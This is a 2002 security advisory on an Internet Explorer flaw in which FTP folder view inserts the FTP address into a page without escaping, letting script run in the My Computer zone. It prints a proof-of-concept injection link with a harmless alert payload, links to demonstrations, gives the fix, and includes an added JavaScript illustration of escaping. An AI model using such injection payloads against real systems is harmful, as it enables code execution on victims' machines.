Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability



10th Jun 2002 [SBWID-5417]
COMMAND

	Internet  Explorer  'Folder  View  for  FTP  sites'   Script   Execution
	vulnerability
	

	

SYSTEMS AFFECTED

	 IE5.5SP1

	 IE5.5SP2

	 IE6.0

	

PROBLEM

	Eiji James Yoshida [zaddik@geocities.co.jp] found the following:
	

	IE allows malicious scripts to run due to a bug in 'Folder View for
	FTP sites'.
	

	If both the 'Enable folder view for FTP sites' IE Advanced Setting and
	the 'Enable Web content in folders' Explorer Folder Option are enabled,
	a script embedded in the FTP server address will run. (Both options are
	set to 'Enable' by default.)
	

	 * Importantly, the script runs in the My Computer zone!

	

	

	 Details
	 =======

	

	The problem is in FTP.HTT invoked by the 'folder  view  for  FTP  sites'
	feature.
	

	

	( %SystemRoot%\WEB\FTP.HTT )

	

	--------------------FTP.HTT--------------------
	35:    <BASE href="%THISDIRPATH%\">
	-----------------------------------------------

	

	

	'%THISDIRPATH%' is inserted into the href attribute without being escaped.
	

	(Example 1)
	

	[ ftp://TARGET ]
	    '%THISDIRPATH%' = 'ftp://TARGET/'
	    <BASE href="ftp://TARGET/\">
	                ~~~~~~~~~~~~~

	

	

	(Example 2)
	

	[ ftp://"><script>alert("Exploit");</script> ]
	    '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
	    <BASE href="ftp://"><script>alert("Exploit");</script>/\">
	                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	

	

	

	 Exploit code
	 ============

	

	

	<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>
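
	The substitution from Examples 1 and 2, modelled in JavaScript as an added example (not code from the advisory or from Internet Explorer). The template line is the one quoted from FTP.HTT; the function names and the trimming of the link's trailing %20 are assumptions made for illustration. It puts the verbatim substitution next to one that HTML-escapes the value before it reaches the href attribute.

```javascript
// Added illustration: models the FTP.HTT substitution described above.
// TEMPLATE_LINE is the line quoted from FTP.HTT; all function names are hypothetical.
const TEMPLATE_LINE = '<BASE href="%THISDIRPATH%\\">';

// Behaviour the advisory describes: the value is pasted in verbatim.
// (A replacer function is used so '$' in the value is never interpreted.)
function renderUnescaped(dirPath) {
  return TEMPLATE_LINE.replace('%THISDIRPATH%', () => dirPath);
}

// HTML attribute-value escaping: neutralise the characters that can end the
// quoted attribute or start a new tag.
function escapeHtmlAttr(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Corrected form: escape first, then substitute.
function renderEscaped(dirPath) {
  return TEMPLATE_LINE.replace('%THISDIRPATH%', () => escapeHtmlAttr(dirPath));
}

// Rough structural check: names of the start tags an HTML parser would see.
function tagNames(html) {
  return [...html.matchAll(/<([A-Za-z][A-Za-z0-9]*)/g)].map(m => m[1].toUpperCase());
}

// Host part of the link in the "Exploit code" section, percent-decoded.
// Trimming the trailing space is an assumption made to match Example 2.
const hostFromLink = decodeURIComponent(
  '%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20');
const dirPath = 'ftp://' + hostFromLink.trim() + '/';

console.log(renderUnescaped('ftp://TARGET/'));    // Example 1
console.log(renderUnescaped(dirPath));            // Example 2
console.log(tagNames(renderUnescaped(dirPath)));  // BASE plus an injected element
console.log(renderEscaped(dirPath));              // value stays inside href
console.log(tagNames(renderEscaped(dirPath)));    // BASE only
```

	After escaping, the quote that closed the attribute and the angle brackets arrive as character references, so the whole address remains the value of href and no second element is created.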

	

	

	

	 Demonstration
	 =============

	

	

	http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html

	

	

	

	 Add-on from Thor Larholm [Thor@jubii.dk]:
	 =========================================

	

	To clear things up, this is yet another XSS  vulnerability  that  allows
	arbitrary HTML to be inserted in the My Computer  zone.  This  makes  it
	quite easy to e.g. execute arbitrary commands, undoubtedly  a  more  fun
	demonstration:
	

	

	http://jscript.dk/Jumper/xploit/ftpfolderview.html

	

	

SOLUTION

	 Workaround
	 ==========

	

	Disable either the 'Enable folder view for FTP sites' IE Advanced Setting
	or the 'Enable Web content in folders' Explorer Folder Option.
	

	 Patch (Update : 05 August 2002)
	 =====

	

	Get Microsoft Windows 2000 SP3
	

	

